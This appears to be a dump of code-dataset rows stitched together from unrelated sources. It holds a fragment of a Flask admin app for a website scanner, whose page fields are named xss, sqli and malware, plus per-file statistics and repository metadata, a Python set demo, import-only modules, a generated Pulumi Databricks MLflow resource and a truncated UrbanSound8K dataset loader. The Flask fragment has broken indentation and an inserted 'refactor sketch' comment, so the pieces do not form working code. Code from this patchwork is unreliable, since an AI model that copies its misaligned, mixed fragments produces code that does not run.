        vulnerability= request.form['vulnerability']
scanned= request.form['scanned']
edited_page = Page(domain, user_id, last_mod, timestamp,
url,
xss,
sqli,
sql,
csrf,
hash,
uptime,
loadspeed,
pagecontent,
externallinks,
scripts,
base64,
documenttype,
virus,
malware,
reputation,
popups,
bruteforce,
title,
redirect,
sensitivedata,
emailaddresses,
adaissues,
accesscontrol,
                        vulnerability,
scanned, page_id)
edited_page.update_to_mongo()
return render_template('/pages/updated_page.html')
@page_blueprint.route('/admin/remove_page/<string:page_id>', methods=['GET'])
@user_decorators.requires_login #mike added
def remove_page(page_id):
    page = Page.remove_from_mongo_id(page_id)
#if request.method == 'GET':
return render_template('/pages/deleted_page.html')
#else:
#title = request.form['title']
#content = request.form['content']
#user = User.get_by_email(session['email'])
#new_post = Post(blog_id, title, content, user.email)
#new_post.save_to_mongo()
#return make_response(blog_posts(blog_id))
@page_blueprint.route('/page_details/<string:page_id>', methods=['GET'])
def show_page(page_id):
    page = Page.from_mongo_id(page_id)
#if request.method == 'GET':
return render_template('/pages/details.html', page_id=page_id, page= page)
#else:
# title = request.form['title']
# content = request.form['content']
# user = User.get_by_email(session['email'])
# new_post = Post(blog_id, title, content, user.email)
# new_post.save_to_mongo()
    # return make_response(blog_posts(blog_id))
#@user_blueprint.route('/alerts')
#@user_decorators.requires_login
#def user_alerts():
# user = User.find_by_email(session['email'])
# return render_template("users/alerts.jinja2", alerts=user.get_alerts())
#@user_blueprint.route('/logout')
#def logout_user():
# session['email'] = None
# return redirect(url_for('home'))
#@user_blueprint.route('/check_alerts/<string:user_id>')
#@user_decorators.requires_login
#def check_user_alerts(user_id):
# pass
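# --- refactor sketch, not part of the original module ---
# create_new_page() and edit_page() above repeat the same ~30 request.form
# reads line by line. Assuming the form keys stay exactly as written there,
# a small helper would collapse that duplication:
#
# def _page_form_values(form, keys):
#     """Collect form values in a fixed key order."""
#     return [form[k] for k in keys]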
| 37.484581 | 114 | 0.57398 | 836 | 8,509 | 5.629187 | 0.120813 | 0.179983 | 0.043349 | 0.047811 | 0.868466 | 0.829154 | 0.791968 | 0.791968 | 0.763706 | 0.743731 | 0 | 0.002733 | 0.312023 | 8,509 | 226 | 115 | 37.650442 | 0.801162 | 0.128805 | 0 | 0.789157 | 0 | 0 | 0.14154 | 0.040266 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.042169 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
4d4f7310ec42e034f7c2711d7f85e4532ad11c7a | 147 | py | Python | 05/00/1.py | pylangstudy/201706 | f1cc6af6b18e5bd393cda27f5166067c4645d4d3 | [
"CC0-1.0"
] | null | null | null | 05/00/1.py | pylangstudy/201706 | f1cc6af6b18e5bd393cda27f5166067c4645d4d3 | [
"CC0-1.0"
] | 70 | 2017-06-01T11:02:51.000Z | 2017-06-30T00:35:32.000Z | 05/00/1.py | pylangstudy/201706 | f1cc6af6b18e5bd393cda27f5166067c4645d4d3 | [
"CC0-1.0"
] | null | null | null | basket = set()
print(basket)
basket.add('apple')
print(basket)
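# adding 'apple' again is a no-op: sets only keep unique elements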
basket.add('apple')
print(basket)
basket.update({'orange', 'banana'})
print(basket)
| 16.333333 | 35 | 0.714286 | 20 | 147 | 5.25 | 0.4 | 0.419048 | 0.485714 | 0.380952 | 0.638095 | 0.638095 | 0.638095 | 0.638095 | 0 | 0 | 0 | 0 | 0.07483 | 147 | 8 | 36 | 18.375 | 0.772059 | 0 | 0 | 0.75 | 0 | 0 | 0.14966 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.5 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
4d5a2af2892e2d2439220cb9c4325367a7ac8433 | 49 | py | Python | omnilearn/legacy/__init__.py | fleeb24/foundation | 18c4179cfe2988267827e532f8d8cd0726ef8709 | [
"MIT"
] | 1 | 2020-10-08T21:33:58.000Z | 2020-10-08T21:33:58.000Z | omnilearn/legacy/__init__.py | felixludos/foundation | 62ac096e6c53e12f2e29480506687c652c399d50 | [
"MIT"
] | null | null | null | omnilearn/legacy/__init__.py | felixludos/foundation | 62ac096e6c53e12f2e29480506687c652c399d50 | [
"MIT"
] | null | null | null |
from . import pointnets
# from . import adain
| 8.166667 | 23 | 0.693878 | 6 | 49 | 5.666667 | 0.666667 | 0.588235 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.244898 | 49 | 5 | 24 | 9.8 | 0.918919 | 0.387755 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
4d5f18a0fcc1951ee9291ae5c57d91fc3e53271a | 368 | py | Python | terrascript/resource/nsxt.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 507 | 2017-07-26T02:58:38.000Z | 2022-01-21T12:35:13.000Z | terrascript/resource/nsxt.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 135 | 2017-07-20T12:01:59.000Z | 2021-10-04T22:25:40.000Z | terrascript/resource/nsxt.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 81 | 2018-02-20T17:55:28.000Z | 2022-01-31T07:08:40.000Z | # terrascript/resource/nsxt.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:22:57 UTC)
#
# For imports without namespace, e.g.
#
# >>> import terrascript.resource.nsxt
#
# instead of
#
# >>> import terrascript.resource.vmware.nsxt
#
# This is only available for 'official' and 'partner' providers.
from terrascript.resource.vmware.nsxt import *
| 24.533333 | 73 | 0.736413 | 49 | 368 | 5.530612 | 0.714286 | 0.280443 | 0.169742 | 0.214022 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.037855 | 0.138587 | 368 | 14 | 74 | 26.285714 | 0.817035 | 0.80163 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
4db2c7396027937a599261ea205cd3a1a60f48d2 | 131 | py | Python | src/csbuilder/pool/__init__.py | huykingsofm/csbuilder | c6ba6f0dd3fd2a0d03c7492de20a7107cb1b9191 | [
"MIT"
] | null | null | null | src/csbuilder/pool/__init__.py | huykingsofm/csbuilder | c6ba6f0dd3fd2a0d03c7492de20a7107cb1b9191 | [
"MIT"
] | null | null | null | src/csbuilder/pool/__init__.py | huykingsofm/csbuilder | c6ba6f0dd3fd2a0d03c7492de20a7107cb1b9191 | [
"MIT"
] | null | null | null | from csbuilder.pool.pool import Pool
from csbuilder.pool.func import protocols, states, roles, scheme, response, active_activation
| 43.666667 | 93 | 0.832061 | 18 | 131 | 6 | 0.666667 | 0.240741 | 0.314815 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.099237 | 131 | 2 | 94 | 65.5 | 0.915254 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
4dcdca587b5f6ae75d421b49a63456cf339127b9 | 149 | py | Python | vectorhub/encoders/text/tfhub/__init__.py | zeta1999/vectorhub | e9b23ac66bd170dd9d6639c3abffde3026d0935e | [
"Apache-2.0"
] | null | null | null | vectorhub/encoders/text/tfhub/__init__.py | zeta1999/vectorhub | e9b23ac66bd170dd9d6639c3abffde3026d0935e | [
"Apache-2.0"
] | null | null | null | vectorhub/encoders/text/tfhub/__init__.py | zeta1999/vectorhub | e9b23ac66bd170dd9d6639c3abffde3026d0935e | [
"Apache-2.0"
] | 1 | 2020-12-03T14:31:14.000Z | 2020-12-03T14:31:14.000Z | from .albert import *
from .bert import *
from .labse import *
from .use import *
from .use_multi import *
from .use_lite import *
 | 21.285714 | 24 | 0.724832 | 23 | 149 | 4.608696 | 0.347826 | 0.566038 | 0.490566 | 0.358491 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.181208 | 149 | 7 | 25 | 21.285714 | 0.868852 | 0 | 0 | 0.285714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
150e37056cb1b15a21ae8d3d4cef85e7b38b9414 | 611 | py | Python | temboo/core/Library/Facebook/Actions/Fitness/Walks/__init__.py | jordanemedlock/psychtruths | 52e09033ade9608bd5143129f8a1bfac22d634dd | [
"Apache-2.0"
] | 7 | 2016-03-07T02:07:21.000Z | 2022-01-21T02:22:41.000Z | temboo/core/Library/Facebook/Actions/Fitness/Walks/__init__.py | jordanemedlock/psychtruths | 52e09033ade9608bd5143129f8a1bfac22d634dd | [
"Apache-2.0"
] | null | null | null | temboo/core/Library/Facebook/Actions/Fitness/Walks/__init__.py | jordanemedlock/psychtruths | 52e09033ade9608bd5143129f8a1bfac22d634dd | [
"Apache-2.0"
] | 8 | 2016-06-14T06:01:11.000Z | 2020-04-22T09:21:44.000Z | from temboo.Library.Facebook.Actions.Fitness.Walks.CreateWalk import CreateWalk, CreateWalkInputSet, CreateWalkResultSet, CreateWalkChoreographyExecution
from temboo.Library.Facebook.Actions.Fitness.Walks.DeleteWalk import DeleteWalk, DeleteWalkInputSet, DeleteWalkResultSet, DeleteWalkChoreographyExecution
from temboo.Library.Facebook.Actions.Fitness.Walks.ReadWalks import ReadWalks, ReadWalksInputSet, ReadWalksResultSet, ReadWalksChoreographyExecution
from temboo.Library.Facebook.Actions.Fitness.Walks.UpdateWalk import UpdateWalk, UpdateWalkInputSet, UpdateWalkResultSet, UpdateWalkChoreographyExecution
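# Each choreo ships as four generated classes: the Choreo itself plus its
# InputSet, ResultSet, and ChoreographyExecution helpers.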
| 122.2 | 153 | 0.895254 | 52 | 611 | 10.519231 | 0.461538 | 0.073126 | 0.124314 | 0.182815 | 0.321755 | 0.321755 | 0.321755 | 0 | 0 | 0 | 0 | 0 | 0.045827 | 611 | 4 | 154 | 152.75 | 0.93825 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 1 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
129f04396ff8eb058d45ac92c5b71bb41c1e3e6d | 20,459 | py | Python | sdk/python/pulumi_databricks/mlflow_experiment.py | pulumi/pulumi-databricks | 43580d4adbd04b72558f368ff0eef3d03432ebc1 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_databricks/mlflow_experiment.py | pulumi/pulumi-databricks | 43580d4adbd04b72558f368ff0eef3d03432ebc1 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_databricks/mlflow_experiment.py | pulumi/pulumi-databricks | 43580d4adbd04b72558f368ff0eef3d03432ebc1 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['MlflowExperimentArgs', 'MlflowExperiment']
@pulumi.input_type
class MlflowExperimentArgs:
def __init__(__self__, *,
artifact_location: Optional[pulumi.Input[str]] = None,
creation_time: Optional[pulumi.Input[int]] = None,
description: Optional[pulumi.Input[str]] = None,
experiment_id: Optional[pulumi.Input[str]] = None,
last_update_time: Optional[pulumi.Input[int]] = None,
lifecycle_stage: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a MlflowExperiment resource.
:param pulumi.Input[str] artifact_location: Path to dbfs:/ or s3:// artifact location of the MLflow experiment.
:param pulumi.Input[str] description: The description of the MLflow experiment.
:param pulumi.Input[str] name: Name of MLflow experiment. It must be an absolute path within the Databricks workspace, e.g. `/Users/<some-username>/my-experiment`. For more information about changes to experiment naming conventions, see [mlflow docs](https://docs.databricks.com/applications/mlflow/experiments.html#experiment-migration).
"""
if artifact_location is not None:
pulumi.set(__self__, "artifact_location", artifact_location)
if creation_time is not None:
pulumi.set(__self__, "creation_time", creation_time)
if description is not None:
pulumi.set(__self__, "description", description)
if experiment_id is not None:
pulumi.set(__self__, "experiment_id", experiment_id)
if last_update_time is not None:
pulumi.set(__self__, "last_update_time", last_update_time)
if lifecycle_stage is not None:
pulumi.set(__self__, "lifecycle_stage", lifecycle_stage)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter(name="artifactLocation")
def artifact_location(self) -> Optional[pulumi.Input[str]]:
"""
Path to dbfs:/ or s3:// artifact location of the MLflow experiment.
"""
return pulumi.get(self, "artifact_location")
@artifact_location.setter
def artifact_location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "artifact_location", value)
@property
@pulumi.getter(name="creationTime")
def creation_time(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "creation_time")
@creation_time.setter
def creation_time(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "creation_time", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The description of the MLflow experiment.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="experimentId")
def experiment_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "experiment_id")
@experiment_id.setter
def experiment_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "experiment_id", value)
@property
@pulumi.getter(name="lastUpdateTime")
def last_update_time(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "last_update_time")
@last_update_time.setter
def last_update_time(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "last_update_time", value)
@property
@pulumi.getter(name="lifecycleStage")
def lifecycle_stage(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "lifecycle_stage")
@lifecycle_stage.setter
def lifecycle_stage(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "lifecycle_stage", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of MLflow experiment. It must be an absolute path within the Databricks workspace, e.g. `/Users/<some-username>/my-experiment`. For more information about changes to experiment naming conventions, see [mlflow docs](https://docs.databricks.com/applications/mlflow/experiments.html#experiment-migration).
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class _MlflowExperimentState:
def __init__(__self__, *,
artifact_location: Optional[pulumi.Input[str]] = None,
creation_time: Optional[pulumi.Input[int]] = None,
description: Optional[pulumi.Input[str]] = None,
experiment_id: Optional[pulumi.Input[str]] = None,
last_update_time: Optional[pulumi.Input[int]] = None,
lifecycle_stage: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering MlflowExperiment resources.
:param pulumi.Input[str] artifact_location: Path to dbfs:/ or s3:// artifact location of the MLflow experiment.
:param pulumi.Input[str] description: The description of the MLflow experiment.
:param pulumi.Input[str] name: Name of MLflow experiment. It must be an absolute path within the Databricks workspace, e.g. `/Users/<some-username>/my-experiment`. For more information about changes to experiment naming conventions, see [mlflow docs](https://docs.databricks.com/applications/mlflow/experiments.html#experiment-migration).
"""
if artifact_location is not None:
pulumi.set(__self__, "artifact_location", artifact_location)
if creation_time is not None:
pulumi.set(__self__, "creation_time", creation_time)
if description is not None:
pulumi.set(__self__, "description", description)
if experiment_id is not None:
pulumi.set(__self__, "experiment_id", experiment_id)
if last_update_time is not None:
pulumi.set(__self__, "last_update_time", last_update_time)
if lifecycle_stage is not None:
pulumi.set(__self__, "lifecycle_stage", lifecycle_stage)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter(name="artifactLocation")
def artifact_location(self) -> Optional[pulumi.Input[str]]:
"""
Path to dbfs:/ or s3:// artifact location of the MLflow experiment.
"""
return pulumi.get(self, "artifact_location")
@artifact_location.setter
def artifact_location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "artifact_location", value)
@property
@pulumi.getter(name="creationTime")
def creation_time(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "creation_time")
@creation_time.setter
def creation_time(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "creation_time", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The description of the MLflow experiment.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="experimentId")
def experiment_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "experiment_id")
@experiment_id.setter
def experiment_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "experiment_id", value)
@property
@pulumi.getter(name="lastUpdateTime")
def last_update_time(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "last_update_time")
@last_update_time.setter
def last_update_time(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "last_update_time", value)
@property
@pulumi.getter(name="lifecycleStage")
def lifecycle_stage(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "lifecycle_stage")
@lifecycle_stage.setter
def lifecycle_stage(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "lifecycle_stage", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of MLflow experiment. It must be an absolute path within the Databricks workspace, e.g. `/Users/<some-username>/my-experiment`. For more information about changes to experiment naming conventions, see [mlflow docs](https://docs.databricks.com/applications/mlflow/experiments.html#experiment-migration).
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
class MlflowExperiment(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
artifact_location: Optional[pulumi.Input[str]] = None,
creation_time: Optional[pulumi.Input[int]] = None,
description: Optional[pulumi.Input[str]] = None,
experiment_id: Optional[pulumi.Input[str]] = None,
last_update_time: Optional[pulumi.Input[int]] = None,
lifecycle_stage: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
This resource allows you to manage [MLflow experiments](https://docs.databricks.com/data/data-sources/mlflow-experiment.html) in Databricks.
## Example Usage
```python
import pulumi
import pulumi_databricks as databricks
me = databricks.get_current_user()
this = databricks.MlflowExperiment("this",
artifact_location="dbfs:/tmp/my-experiment",
description="My MLflow experiment description")
```
## Access Control
* Permissions can control which groups or individual users can *Read*, *Edit*, or *Manage* individual experiments.
## Related Resources
The following resources are often used in the same context:
* End to end workspace management guide.
        * Directory to manage directories in [Databricks Workspace](https://docs.databricks.com/workspace/workspace-objects.html).
* MlflowModel to create [MLflow models](https://docs.databricks.com/applications/mlflow/models.html) in Databricks.
* Notebook to manage [Databricks Notebooks](https://docs.databricks.com/notebooks/index.html).
* Notebook data to export a notebook from Databricks Workspace.
* Repo to manage [Databricks Repos](https://docs.databricks.com/repos.html).
## Import
        The experiment resource can be imported using the id of the experiment:
```sh
$ pulumi import databricks:index/mlflowExperiment:MlflowExperiment this <experiment-id>
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] artifact_location: Path to dbfs:/ or s3:// artifact location of the MLflow experiment.
:param pulumi.Input[str] description: The description of the MLflow experiment.
:param pulumi.Input[str] name: Name of MLflow experiment. It must be an absolute path within the Databricks workspace, e.g. `/Users/<some-username>/my-experiment`. For more information about changes to experiment naming conventions, see [mlflow docs](https://docs.databricks.com/applications/mlflow/experiments.html#experiment-migration).
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: Optional[MlflowExperimentArgs] = None,
opts: Optional[pulumi.ResourceOptions] = None):
"""
This resource allows you to manage [MLflow experiments](https://docs.databricks.com/data/data-sources/mlflow-experiment.html) in Databricks.
## Example Usage
```python
import pulumi
import pulumi_databricks as databricks
me = databricks.get_current_user()
this = databricks.MlflowExperiment("this",
artifact_location="dbfs:/tmp/my-experiment",
description="My MLflow experiment description")
```
## Access Control
* Permissions can control which groups or individual users can *Read*, *Edit*, or *Manage* individual experiments.
## Related Resources
The following resources are often used in the same context:
* End to end workspace management guide.
        * Directory to manage directories in [Databricks Workspace](https://docs.databricks.com/workspace/workspace-objects.html).
* MlflowModel to create [MLflow models](https://docs.databricks.com/applications/mlflow/models.html) in Databricks.
* Notebook to manage [Databricks Notebooks](https://docs.databricks.com/notebooks/index.html).
* Notebook data to export a notebook from Databricks Workspace.
* Repo to manage [Databricks Repos](https://docs.databricks.com/repos.html).
## Import
        The experiment resource can be imported using the id of the experiment:
```sh
$ pulumi import databricks:index/mlflowExperiment:MlflowExperiment this <experiment-id>
```
:param str resource_name: The name of the resource.
:param MlflowExperimentArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(MlflowExperimentArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
artifact_location: Optional[pulumi.Input[str]] = None,
creation_time: Optional[pulumi.Input[int]] = None,
description: Optional[pulumi.Input[str]] = None,
experiment_id: Optional[pulumi.Input[str]] = None,
last_update_time: Optional[pulumi.Input[int]] = None,
lifecycle_stage: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = MlflowExperimentArgs.__new__(MlflowExperimentArgs)
__props__.__dict__["artifact_location"] = artifact_location
__props__.__dict__["creation_time"] = creation_time
__props__.__dict__["description"] = description
__props__.__dict__["experiment_id"] = experiment_id
__props__.__dict__["last_update_time"] = last_update_time
__props__.__dict__["lifecycle_stage"] = lifecycle_stage
__props__.__dict__["name"] = name
super(MlflowExperiment, __self__).__init__(
'databricks:index/mlflowExperiment:MlflowExperiment',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
artifact_location: Optional[pulumi.Input[str]] = None,
creation_time: Optional[pulumi.Input[int]] = None,
description: Optional[pulumi.Input[str]] = None,
experiment_id: Optional[pulumi.Input[str]] = None,
last_update_time: Optional[pulumi.Input[int]] = None,
lifecycle_stage: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None) -> 'MlflowExperiment':
"""
Get an existing MlflowExperiment resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] artifact_location: Path to dbfs:/ or s3:// artifact location of the MLflow experiment.
:param pulumi.Input[str] description: The description of the MLflow experiment.
:param pulumi.Input[str] name: Name of MLflow experiment. It must be an absolute path within the Databricks workspace, e.g. `/Users/<some-username>/my-experiment`. For more information about changes to experiment naming conventions, see [mlflow docs](https://docs.databricks.com/applications/mlflow/experiments.html#experiment-migration).
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _MlflowExperimentState.__new__(_MlflowExperimentState)
__props__.__dict__["artifact_location"] = artifact_location
__props__.__dict__["creation_time"] = creation_time
__props__.__dict__["description"] = description
__props__.__dict__["experiment_id"] = experiment_id
__props__.__dict__["last_update_time"] = last_update_time
__props__.__dict__["lifecycle_stage"] = lifecycle_stage
__props__.__dict__["name"] = name
return MlflowExperiment(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="artifactLocation")
def artifact_location(self) -> pulumi.Output[Optional[str]]:
"""
Path to dbfs:/ or s3:// artifact location of the MLflow experiment.
"""
return pulumi.get(self, "artifact_location")
@property
@pulumi.getter(name="creationTime")
def creation_time(self) -> pulumi.Output[int]:
return pulumi.get(self, "creation_time")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
The description of the MLflow experiment.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="experimentId")
def experiment_id(self) -> pulumi.Output[str]:
return pulumi.get(self, "experiment_id")
@property
@pulumi.getter(name="lastUpdateTime")
def last_update_time(self) -> pulumi.Output[int]:
return pulumi.get(self, "last_update_time")
@property
@pulumi.getter(name="lifecycleStage")
def lifecycle_stage(self) -> pulumi.Output[str]:
return pulumi.get(self, "lifecycle_stage")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Name of MLflow experiment. It must be an absolute path within the Databricks workspace, e.g. `/Users/<some-username>/my-experiment`. For more information about changes to experiment naming conventions, see [mlflow docs](https://docs.databricks.com/applications/mlflow/experiments.html#experiment-migration).
"""
return pulumi.get(self, "name")
| 45.872197 | 346 | 0.667823 | 2,340 | 20,459 | 5.630769 | 0.090171 | 0.065953 | 0.090847 | 0.075137 | 0.873482 | 0.859897 | 0.85466 | 0.84578 | 0.835686 | 0.812917 | 0 | 0.000506 | 0.226502 | 20,459 | 445 | 347 | 45.975281 | 0.832101 | 0.343467 | 0 | 0.819231 | 1 | 0 | 0.100685 | 0.003983 | 0 | 0 | 0 | 0 | 0 | 1 | 0.161538 | false | 0.003846 | 0.019231 | 0.046154 | 0.276923 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
12c1c3c4c1bd9ffb9fb6fcdb711200022d3be755 | 12,919 | py | Python | data/urbansound8k.py | hackerekcah/conv-hcpc | 1ac4a558e38bdba68162bfcc5cd8b2b7c8eea1b9 | [
"MIT"
] | null | null | null | data/urbansound8k.py | hackerekcah/conv-hcpc | 1ac4a558e38bdba68162bfcc5cd8b2b7c8eea1b9 | [
"MIT"
] | null | null | null | data/urbansound8k.py | hackerekcah/conv-hcpc | 1ac4a558e38bdba68162bfcc5cd8b2b7c8eea1b9 | [
"MIT"
] | null | null | null | import torch
import os
import logging
import glob
import soundfile as sf
import numpy as np
import resampy
import sys
import torchaudio
from data.data_transformer import Compose, FakePitchShift
from data import register_dataset
import math
from tqdm import tqdm
torchaudio.set_audio_backend("soundfile") # switch backend
logger = logging.getLogger(__name__)
@register_dataset
class UrbanSound8K(torch.utils.data.Dataset):
"""
    Sample rate differs from file to file; most recordings are 44100, 48000, or 96000 Hz.
    Clips are at most 4 seconds long; shorter ones are zero-padded to 4 s on both sides.
"""
def __init__(self, fold, split, target_sr=44100, transform=None):
super(UrbanSound8K, self).__init__()
if target_sr == 44100:
root = '/data/songhongwei/UrbanSound8K/audio44100/'
elif target_sr == 22050:
root = '/data/songhongwei/UrbanSound8K/audio22050/'
else:
